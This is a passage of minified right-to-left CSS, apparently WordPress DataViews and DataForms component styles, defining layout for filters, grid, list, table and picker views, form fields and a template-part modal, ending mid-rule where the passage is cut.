.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{ -webkit-appearance:none; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{ align-items:center; bottom:0; display:flex; inset-inline-start:12px; justify-content:center; position:absolute; top:0; width:24px; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){ transform:scaleX(-1); } .dataviews-filters__container-visibility-toggle{ flex-shrink:0; position:relative; } .dataviews-filters-toggle__count{ background:var(--wp-admin-theme-color, #3858e9); border-radius:8px; box-sizing:border-box; color:#fff; font-size:11px; height:16px; left:0; line-height:16px; min-width:16px; outline:var(--wp-admin-border-width-focus) solid #fff; padding:0 4px; position:absolute; text-align:center; top:0; transform:translate(-50%, -50%); } .dataviews-search{ width:fit-content; } .dataviews-filters__user-input-widget{ padding:16px; } .dataviews-filters__user-input-widget .components-input-control__prefix{ padding-right:8px; } .dataviews-filters__search-widget-no-elements{ align-items:center; display:flex; justify-content:center; padding:16px; } .dataviews-footer{ background-color:#fff; border-top:1px solid #f0f0f0; bottom:0; flex-shrink:0; padding:12px 48px; position:sticky; right:0; } @media not (prefers-reduced-motion){ .dataviews-footer{ transition:padding .1s ease-out; } } .dataviews-footer{ z-index:2; } @container (max-width: 430px){ .dataviews-footer{ padding:12px 24px; } } @container (max-width: 560px){ .dataviews-footer{ flex-direction:column !important; } .dataviews-footer .dataviews-bulk-actions-footer__container{ width:100%; } .dataviews-footer .dataviews-bulk-actions-footer__item-count{ flex-grow:1; } .dataviews-footer .dataviews-pagination{ justify-content:space-between; width:100%; } } .dataviews-pagination__page-select{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .dataviews-pagination__page-select .components-select-control__input{ font-size:11px !important; font-weight:500; } } .dataviews-action-modal{ z-index:1000001; } .dataviews-picker-footer__bulk-selection{ align-self:flex-start; height:32px; } .dataviews-picker-footer__actions{ align-self:flex-end; } .dataviews-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-selection-checkbox{ flex-shrink:0; line-height:0; } .dataviews-selection-checkbox .components-checkbox-control__input-container{ margin:0; } .dataviews-view-config{ container-type:inline-size; font-size:13px; line-height:1.4; width:320px; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{ height:100%; overflow-y:scroll; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{ width:auto; } .dataviews-view-config__sort-direction .components-toggle-group-control-option-base{ text-transform:uppercase; } .dataviews-settings-section__title.dataviews-settings-section__title{ font-size:15px; line-height:24px; } .dataviews-settings-section__sidebar{ grid-column:span 4; } .dataviews-settings-section__content,.dataviews-settings-section__content>*{ grid-column:span 8; } .dataviews-settings-section__content .is-divided-in-two{ display:contents; } .dataviews-settings-section__content .is-divided-in-two>*{ grid-column:span 4; } .dataviews-settings-section:has(.dataviews-settings-section__content:empty){ display:none; } @container (max-width: 500px){ .dataviews-settings-section.dataviews-settings-section{ grid-template-columns:repeat(2, 1fr); } .dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{ grid-column:span 2; } } .dataviews-field-control__field{ height:32px; } .dataviews-field-control__actions{ position:absolute; top:-9999em; } .dataviews-field-control__actions.dataviews-field-control__actions{ gap:4px; } .dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{ position:unset; top:unset; } .dataviews-field-control__icon{ display:flex; width:24px; } .dataviews-field-control__label-sub-label-container{ flex-grow:1; } .dataviews-field-control__label{ display:block; } .dataviews-field-control__sub-label{ color:#757575; font-size:11px; font-style:normal; margin-bottom:0; margin-top:8px; } .dataviews-view-grid-items{ container-type:inline-size; display:grid; gap:32px; grid-template-columns:repeat(auto-fill, minmax(230px, 1fr)); grid-template-rows:max-content; margin-bottom:auto; padding:0 48px 24px; } @container (max-width: 430px){ .dataviews-view-grid-items{ padding-left:24px; padding-right:24px; } } @media not (prefers-reduced-motion){ .dataviews-view-grid-items{ transition:padding .1s ease-out; } } .dataviews-view-grid .dataviews-view-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{ width:fit-content; } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ color:#1e1e1e; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; overflow:hidden; position:relative; width:100%; } .dataviews-view-grid .dataviews-view-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-grid .dataviews-view-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; pointer-events:none; position:absolute; right:0; top:0; width:100%; } .dataviews-view-grid .dataviews-view-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-grid .dataviews-view-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{ align-items:center; min-height:24px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){ display:none; } .dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{ display:none; } .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:0; position:absolute; right:8px; top:-9999em; z-index:1; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-selection-checkbox{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:1; top:8px; } } .dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{ opacity:1; top:8px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions{ left:4px; opacity:0; position:absolute; top:4px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{ background-color:#fff; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ opacity:1; top:4px; } } .dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{ opacity:1; } .dataviews-view-grid__media--clickable{ cursor:pointer; } .dataviews-view-grid__group-header{ color:#1e1e1e; container-type:inline-size; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } @container (max-width: 430px){ .dataviews-view-grid__group-header{ padding-left:24px; padding-right:24px; } } div.dataviews-view-list{ list-style-type:none; } .dataviews-view-list{ margin:0 0 auto; } .dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{ border-top:1px solid #f0f0f0; margin:0; } .dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{ box-sizing:border-box; padding:16px 24px; position:relative; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{ display:flex; flex:0 0 auto; gap:4px; white-space:nowrap; width:max-content; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{ position:relative; z-index:1; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{ height:24px; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex:0; overflow:hidden; width:0; } .dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } @media (hover:none){ .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } } .dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{ color:#1e1e1e; } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{ background-color:#f8f8f8; color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#1e1e1e; } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list .dataviews-view-list__item{ appearance:none; background:none; border:none; cursor:pointer; inset:0; padding:0; position:absolute; scroll-margin:8px 0; z-index:1; } .dataviews-view-list .dataviews-view-list__item:focus-visible{ outline:none; } .dataviews-view-list .dataviews-view-list__item:focus-visible:before{ border-radius:2px; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .dataviews-view-list .dataviews-view-list__title-field{ flex:1; line-height:24px; min-height:24px; overflow:hidden; } .dataviews-view-list .dataviews-view-list__title-field:has(a,button){ z-index:1; } .dataviews-view-list .dataviews-view-list__media-wrapper{ background-color:#fff; border-radius:4px; flex-shrink:0; height:52px; overflow:hidden; position:relative; width:52px; } .dataviews-view-list .dataviews-view-list__media-wrapper img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-list .dataviews-view-list__media-wrapper:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .dataviews-view-list .dataviews-view-list__field-wrapper{ flex-grow:1; min-height:52px; } .dataviews-view-list .dataviews-view-list__fields{ color:#757575; display:flex; flex-wrap:wrap; font-size:12px; gap:12px; row-gap:4px; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{ display:none; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{ align-items:center; display:flex; line-height:20px; min-height:24px; } .dataviews-view-list+.dataviews-pagination{ justify-content:space-between; } .dataviews-view-list__group-header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 24px; } .dataviews-view-table{ border-collapse:collapse; border-color:inherit; color:#757575; margin-bottom:auto; position:relative; text-indent:0; width:100%; } .dataviews-view-table th{ color:#1e1e1e; font-size:13px; font-weight:400; text-align:right; } .dataviews-view-table td,.dataviews-view-table th{ padding:12px; } .dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{ text-align:left; } .dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{ background-color:#fff; left:0; position:sticky; } .dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{ background-color:#f0f0f0; bottom:0; content:""; display:block; position:absolute; right:0; top:0; width:1px; } .dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{ padding-left:0; } .dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{ max-width:auto; min-width:auto; } .dataviews-view-table tr{ border-top:1px solid #f0f0f0; } .dataviews-view-table tr .dataviews-view-table-header-button{ gap:4px; } .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-right:48px; } .dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{ margin-right:-8px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-left:48px; } .dataviews-view-table tr:last-child{ border-bottom:0; } .dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{ background-color:#f8f8f8; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:0; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{ opacity:1; } .dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:0; } .dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } @media (hover:none){ .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } } .dataviews-view-table tr.is-selected{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#757575; } .dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-table tr.is-selected:hover{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 4%, #fff); } .dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 8%, #fff); } .dataviews-view-table thead{ inset-block-start:0; position:sticky; z-index:1; } .dataviews-view-table thead tr{ border:0; } .dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:1; } .dataviews-view-table thead th{ background-color:#fff; font-size:11px; font-weight:500; padding-bottom:8px; padding-right:12px; padding-top:8px; text-transform:uppercase; } .dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-right:4px; } .dataviews-view-table tbody td{ vertical-align:top; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{ align-items:center; display:flex; min-height:32px; white-space:nowrap; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{ justify-content:flex-end; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{ justify-content:center; } .dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){ min-height:0; } .dataviews-view-table .dataviews-view-table-header-button{ font-size:11px; font-weight:500; padding:4px 8px; text-transform:uppercase; } .dataviews-view-table .dataviews-view-table-header-button:not(:hover){ color:#1e1e1e; } .dataviews-view-table .dataviews-view-table-header-button span{ speak:none; } .dataviews-view-table .dataviews-view-table-header-button span:empty{ display:none; } .dataviews-view-table .dataviews-view-table-header{ padding-right:4px; } .dataviews-view-table .dataviews-view-table__actions-column{ white-space:nowrap; width:auto; } .dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{ opacity:1; } .dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-right:0; } .dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{ padding:4px 8px; } .dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{ padding:16px 12px; } .dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{ padding-left:0; } @container (max-width: 430px){ .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-right:24px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-left:24px; } } .dataviews-view-table-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-view-table-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-column-primary__media{ background-color:#fff; border-radius:4px; flex-shrink:0; max-width:60px; overflow:hidden; position:relative; } .dataviews-column-primary__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-column-primary__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){ max-width:80ch; min-width:15ch; } .dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{ color:#1e1e1e; font-weight:500; padding:12px 48px; } .dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){ width:1%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{ width:fit-content; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ color:#1e1e1e; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-picker-grid:focus-visible[aria-activedescendant]{ outline:none; } .dataviews-view-picker-grid:focus-visible [data-active-item=true]{ outline:2px solid var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-selection-checkbox{ top:8px !important; } .dataviews-view-picker-grid .dataviews-selection-checkbox input{ pointer-events:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; position:relative; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; pointer-events:none; position:absolute; right:0; top:0; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{ align-items:center; min-height:24px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){ display:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{ display:none; } .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ position:absolute; right:8px; top:-9999em; z-index:1; } @media (hover:none){ .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ top:8px; } } .dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{ top:8px; } .dataviews-view-picker-grid__media--clickable{ cursor:pointer; } .dataviews-view-picker-grid-group__header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } .dataviews-controls__datetime{ border:none; padding:0; } .dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{ flex:1 1 50%; } .dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{ -webkit-appearance:none; display:none; } .dataviews-controls__date-preset{ border:1px solid #ddd; } .dataviews-controls__date-preset:active{ background-color:#000; } .dataforms-layouts-panel__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-panel__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-panel__field-label--label-position-side{ align-self:center; } .dataforms-layouts-panel__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-panel__field-control .components-button{ max-width:100%; min-height:32px; text-align:right; text-wrap:balance; text-wrap:pretty; white-space:normal; } .dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{ text-decoration:none; } .dataforms-layouts-panel__field-control .components-dropdown{ max-width:100%; } .dataforms-layouts-panel__field-dropdown .components-popover__content{ min-width:320px; padding:16px; } .dataforms-layouts-panel__dropdown-header{ margin-bottom:16px; } .dataforms-layouts-panel__modal-footer{ margin-top:16px; } .components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{ z-index:159990; } .dataforms-layouts-regular__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-regular__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-regular__field-label--label-position-side{ align-self:center; } .dataforms-layouts-regular__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-card__field-header-label{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:15px; font-weight:500; line-height:20px; } .dataforms-layouts-card__field{ width:100%; } .dataforms-layouts-card__field-description{ color:#757575; display:block; font-size:13px; margin-bottom:16px; } .dataforms-layouts-card__field-summary{ display:flex; flex-direction:row; gap:16px; } .dataforms-layouts-row__field-control{ width:100%; } .dataforms-layouts__wrapper{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; } :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .fields-create-template-part-modal{ z-index:1000001; } .fields-create-template-part-modal__area-fieldset{ border:0; margin:0; padding:0; } .fields-create-template-part-modal__area-radio-group{ border:1px solid #949494; border-radius:2px; } .fields-create-template-part-modal__area-radio-wrapper{ align-items:center; display:grid; grid-template-columns:min-content 1fr min-content; padding:12px; position:relative; grid-gap:4px 8px; color:#1e1e1e; } .fields-create-template-part-modal__area-radio-wrapper+.fields-create-template-part-modal__area-radio-wrapper{ border-top:1px solid #949494; } .fields-create-template-part-modal__area-radio-wrapper input[type=radio]{ opacity:0; position:absolute; } .fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:checked){ z-index:1; } .fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:not(:checked)):hover{ color:var(--wp-admin-theme-color); } .fields-create-template-part-modal__area-radio-wrapper>:not(.fields-create-template-part-modal__area-radio-label){ pointer-events:none; } .fields-create-template-part-modal__area-radio-label:before{ content:""; 